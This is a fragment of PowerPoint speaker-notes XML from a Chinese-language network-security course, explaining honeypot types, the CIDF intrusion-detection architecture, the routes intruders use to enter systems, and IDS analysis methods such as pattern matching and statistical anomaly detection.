              <a:t>弱化系统的优点是蜜罐可以提供的是攻击者试图入侵的实际服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，这种配置方案解决了许多诱骗服务需要精心配置的问题，而且它不限制蜜罐收集到的信息量，只要攻击者入侵蜜罐的某项服务，系统就会连续记录攻击者的行为并观察他的所有操作过程。这样，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>系统可以获得更多关于攻击本身、攻击方法和攻击工具方面的信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。例如，如果系统观察到入侵者创建目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/tmp/bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用来存储攻击工具，系统管理员应该检验所有的目录是否包含这样的路径，如果找到了这样的路径说明系统已经遭到攻击者的入侵。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>它的缺点是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>“高维护低收益”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。如果攻击者对蜜罐使用已知的攻击方法，弱化系统就变得毫无意义。因为系统管理员已经有防护这种入侵方法的经验，或者系统的最新补丁已经修复了这种攻击漏洞。</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FD8F3E99-6BC2-49B8-AE6D-D24F0B8811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FE93473-1D43-474C-B9E2-08AFEBC8BB76}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>166</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188419" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058B616B-BC55-49F5-A9E2-1552411C2218}"/>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4EC86F51-FD72-4FAB-9E7F-960D0E3D1A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(3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>强化系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>强化系统同弱化系统一样，提供一个真实的环境，是对弱化系统的改进。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>强化系统并不提供一个看似有效的系统，蜜罐管理员为基本操作系统提供了所有发布的安全补丁，此时的系统已经伪装成看似足够安全的。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>当攻击者闯入时，蜜罐就开始收集信息，它能在最短的时间内收集最多的有效数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将强化系统作为蜜罐使用的唯一缺点是，如果攻击者具有更高的技术，那么他很可能取代管理员对系统的控制，从而对其他系统进行攻击。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>所以用这种蜜罐需要系统管理员具有更高的专业技术。</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D0FCFF8A-6B37-4681-A272-975052C2A6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9AD94F5A-50E0-4B3E-A0E4-089880CC6714}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>167</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190467" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BEBAD84-DF84-4EB7-AF74-EA3C4915B09A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190468" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3DE597F-34F3-416E-82CE-948537DA255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(4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户模式服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>用户模式服务器实际上是一个用户进程，它运行在主机上，并且模拟成一个真实的服务器。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在真实主机中，每个应用程序都当作一个具有独立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址的操作系统和服务的特定实例。而用户模式服务器这样一个进程就嵌套在主机操作系统的应用程序空间中，当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户向用户模式服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址发送请求，主机将接受请求并且转发到用户模式服务器上。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>这种模式的成功与否取决于攻击者的进入程度和受骗程度。它的优点体现在系统管理员对用户主机有绝对的控制权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。即使蜜罐被攻陷，由于用户模式服务器是一个用户进程，那么系统管理员只要关闭该进程即可。另外，可以将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>集中于同一台服务器上。当然，其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>局限性不适用于所有的操作系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>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8A21980A-9E9A-4A54-B14C-97E676ED20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A9E976A-B733-43C1-B651-215A505EA4E9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>168</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192515" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C18E69F-AFFF-492D-B07A-FE01B5692C5C}"/>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50F5F422-A342-4453-882A-A6A96DE31B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User mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类似与虚拟机，一个进程模拟一台完整的电脑。所有的数据只不过是电脑上的一个文件。</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8A21980A-9E9A-4A54-B14C-97E676ED20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A9E976A-B733-43C1-B651-215A505EA4E9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>169</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192515" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C18E69F-AFFF-492D-B07A-FE01B5692C5C}"/>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50F5F422-A342-4453-882A-A6A96DE31B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9725340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8A21980A-9E9A-4A54-B14C-97E676ED20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DA9E976A-B733-43C1-B651-215A505EA4E9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>170</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192515" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C18E69F-AFFF-492D-B07A-FE01B5692C5C}"/>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50F5F422-A342-4453-882A-A6A96DE31B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32739172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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773AB3E6-6461-4236-98BE-6DB44039A8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B256AB2-A57D-4B62-A38A-8D3A90E5BFD1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>174</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200707" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D707CC58-253D-429B-BBD3-4BBB39919CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200708" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5CB049D-67D9-4BC9-8A1B-9A38994016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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2BF1DC3-967A-49E8-B0E3-BE643B7126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7659C94C-456C-4AD8-ACC3-1935B571F64F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>175</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202755" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDB19AFF-63D3-45B8-944A-5310A2B6B5A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202756" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27FFD4A0-560A-4C6F-A3FB-B3945E4214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入侵检测系统分为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>个基本组件：事件产生器、事件分析器、响应单元和事件数据库。其中的事件是指</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>需要分析的数据。这些组件以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>GIDO(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>统一入侵检测对象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>格式进行数据交换。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>事件产生器的任务是从入侵检测系统之外的计算环境中收集事件但并不分析它们，并将这些事件转换成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CIDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>GIDO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>格式传送给其他组件。事件分析器分析从其他组件收到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>GIDO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，并将产生的新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>GIDO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>再传送给其他组件。事件数据库用来存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>GIDO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，以备系统需要时使用。响应单元处理收到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>GIDO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，并根据处理结果采取相应的措施，如杀死相关进程、将连接复位、修改文件权限等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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A96A1142-0FD7-4EC4-B9F3-A0559E4AF68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5AADD64-17C9-456F-8C91-EAFF0ED3228A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6745FA20-045C-41ED-B025-67CF3AA1E26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3EFE5758-32A5-4A1B-ABD4-EDFDEA3C95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zh-CN" altLang="en-US"/>
              <a:t>入侵者进入系统的主要途径有：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>物理侵入：指一个入侵者对主机有物理进入权限，比如他们能使用键盘，有权移走硬盘等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>本地侵入: 这类侵入表现为入侵者已经拥有在系统用户的较低权限。如果系统没有打最新的漏洞补丁，就会给侵入者提供一个利用知名漏洞获得系统管理员权限的机会。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>远程侵入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>这类入侵指入侵者通过网络远程进入系统。比如通过植入木马实现对目标主机的控制，从远程发起对目标主机的攻击等。</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75398CF4-4CCB-49F0-BE48-C5D9210140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C4EACDC-FF73-49F9-A17E-C791D9EAE74F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>178</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206851" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D3DC9B-9EFB-4FE9-8012-027E61FD843F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206852" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{493C564E-0FF1-4430-A10A-F8AED2D898E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20000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>事件分析器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>接收事件信息，对其进行分析，判断是否为入侵行为或异常现象，最后将判断的结果转变为告警信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF6699"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF6699"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分析是核心</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>效率高低直接决定整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>性能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分析方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模式匹配：将收集到的信息与已知的网络入侵和系统误用模式数据库进行比较，从而发现违背安全策略的行为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>统计分析：首先给系统对象（如用户、文件、目录和设备等）创建一个统计描述，统计正常使用时的一些测量属性（如访问次数、操作失败次数和延时等）；测量属性的平均值和偏差将被用来与网络、系统的行为进行比较，任何观察值在正常值范围之外时，就认为有入侵发生</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>完整性分析（往往用于事后分析）：主要关注某个文件或对象是否被更改</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1031">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD9D146B-9071-4D19-9EE5-922A93AEB1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DE6B8CB-2907-486B-A9CF-922D6DAE269C}" type="slidenum">
              <a:rPr lang="en-AU" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>185</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="1200">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233475" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E53AAE8-3DAE-4195-A1ED-B39BCB90B1D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233476" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
